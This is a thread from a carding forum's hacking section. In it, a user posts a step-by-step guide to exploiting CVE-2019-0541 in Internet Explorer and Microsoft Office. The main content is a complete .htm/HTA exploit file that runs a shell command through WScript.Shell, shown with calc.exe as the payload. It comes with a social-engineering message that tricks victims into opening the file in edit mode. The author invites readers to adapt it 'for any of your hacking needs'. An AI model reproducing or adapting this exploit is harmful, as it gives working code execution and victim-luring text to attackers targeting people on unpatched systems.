Go Back   Carder.life > [en] International Forum > Hacking & Coding
Reload this Page Internet Explorer .HTM Remote Code Execution

CARDER.MARKET - CARDING FORUM FOR PROFESSIONAL CARDERS


Reply
 
Thread Tools Display Modes
  #1  
Old 05-04-2025, 10:09 AM
quickly's Avatar

quickly quickly is offline
Join Date: Dec 2022
Posts: 1
Default

CVE-2019-0541
In this guide you will learn how to create a .htm file which can execute arbitrary commands in the remote powershell. This is working on all Windows versions and exploits Internet Explorer / Microsoft Office. First of all, the MSHTML Engine is vulnerable due to improper validation of specially crafted web documents (html, xhtml, etc). In other words, the exploit is triggered when users “edit” the documents. These documents are containing a ‘meta’ HTML tag set to ‘ProgId’ and its content set to ‘ProgId’. In this example we use ‘HTAFILE’ to exploit MS IE Browser or MS Office. On patched systems, the file will always open in notepad for editing.
First we will begin with a simple HTML document, opening the HTMl, HEAD and meta tag. As stated before, we are filling the content of the meta with ‘HTAFILE’, and the name as ‘ProgId’.
<html> <head> <meta name="ProgId" content="htafile"> <hta:application id="x"> </head> </html>
Next we will add some fail-safes in the event that a user does not open in Internet Explorer or MS Office. For example, if JavaScript is disabled we will leave an error message persuading to edit with Internet Explorer.
<html> <head><meta name=ProgId content=htafile> </head> <hta:application id=x> <script> try { if (x.commandLine != "") { new ActiveXObject('WScript.Shell').Run('calc.exe',1) } } catch(ex) { alert('Error: This document must be viewed in "Edit" mode: Right-click it, then select the "Edit" menu option. \n If not present, open it with MS IE, make sure the "Menu" bar is displayed, then click "File" menu and then "Edit with...".'); } </script> <noscript> Error: This document must be viewed in "Edit" mode: Right-click it, then select the "Edit" menu option. <br> If not present, open it with MS IE, make sure the "Menu" bar is displayed, then click "File" menu and then "Edit with...". </noscript> </html>
Now you have successfully made an exploited .htm file which executes the shell command to run calculator. You can edit this for any of your hacking needs.
Happy hacking!
  #2  
Old 05-04-2025, 10:27 AM
Владисла5522's Avatar

Владисла5522 Владисла5522 is offline
Join Date: Aug 2021
Posts: 0
Default

Great ~~
Reply

Tags
NULL

« Previous Thread | Next Thread »

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is On
HTML code is On
Forum Jump




All times are GMT. The time now is 07:23 PM.

Contact Us - Carder.life - Archive - Top